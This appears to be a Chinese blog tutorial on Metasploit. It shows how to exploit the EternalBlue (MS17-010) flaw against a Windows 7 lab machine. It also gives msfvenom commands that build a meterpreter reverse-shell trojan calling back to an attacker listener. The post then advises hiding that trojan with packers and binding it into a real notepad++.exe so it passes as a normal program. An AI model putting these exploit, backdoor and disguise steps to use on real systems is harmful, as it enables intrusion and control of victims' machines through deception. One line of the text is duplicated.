kali学习---metasploit

kali—metasploit

metaspolit简介:

msf是一款开源安全漏洞利用和测试工具,继承了各种平台上常见的溢出漏洞和流行的shellcode,并继续保持更新。

  1. 首先终端提权:sudo su,输入密码,进入root权限。
  2. 打开msf:msfconsole,进入msf,注msf版本为 msf6。
采用msf对永恒之蓝漏洞进行扫描和利用:

**永恒之蓝漏洞简介:**2017年之前window系统基本上都存在永恒之蓝漏洞,下面采用msf进行永恒之蓝漏洞的扫描和利用。

  1. search ms17_010,针对永恒之蓝楼栋编号的应用,打开之后会看到以下模块。
  2. 使用模块两种方式:use 0use + name (use exploit/windows/smb/ms17_010_eternalblue) ,进入模块之后进行设置窗口:show options

    看到第一行的必选项(攻击目的的ip地址),还没有填写。接下来设置攻击目标的IP,这里需要一个window7的虚拟机。(msdn中下载相应镜像)。
  3. 查看靶机的ip地址:ipconfig192.168.1.8。并且关闭目标靶机的防火墙,使得kali能够ping通。

  4. show options来看必须要设置的选型。设置目标的ip地址,和端口号。

    之后再次采用 show options来查看是否已经设置完毕。
  5. 之后开始进行攻击run 出现如下界面,攻击成功,可以开始干坏事了(退出:exit;后台运行:background)
msf生成远控制木马

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。(msfvenom在shell里使用,不是msfconsole终端)

  1. windows可执行木马:msfcenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.6 lport=9999 -f exe -o demo.exe

    成功生成木马文件
  2. 开启鱼钩监视。使用use exploit/multi/handler进行监听。

    之后分别设置监听的payloadlhostlport

    run之后就开始等待鱼钩上钩。鱼儿上钩之后自动转换成 meterpreter>

ps:木马包装两种方式。

  1. 使用upx file进行加壳,但是upx对文件的大小有限制,过小文件会导致加壳失败。可选择其他的软件进行加壳:Themida(只有windows版本)。
    件会导致加壳失败。可选择其他的软件进行加壳:Themida(只有windows版本)。
  2. 使用可执行文件进行伪装,捆绑木马。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.6 lport=9999 -f exe -x notepad++.exe -o notepad++.exe。把木马文件捆绑到本来存在的x64文件notepad++.exe下。
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值